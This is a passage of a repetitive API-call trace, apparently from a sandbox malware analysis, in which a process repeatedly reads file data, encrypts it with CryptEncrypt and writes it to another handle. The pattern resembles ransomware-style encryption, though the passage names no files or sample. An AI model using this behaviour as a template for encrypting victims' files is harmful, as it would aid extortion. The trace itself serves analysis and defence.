Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.108] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.109] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.110] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.110] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.111] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.112] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.112] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.113] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.113] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.114] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.114] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, 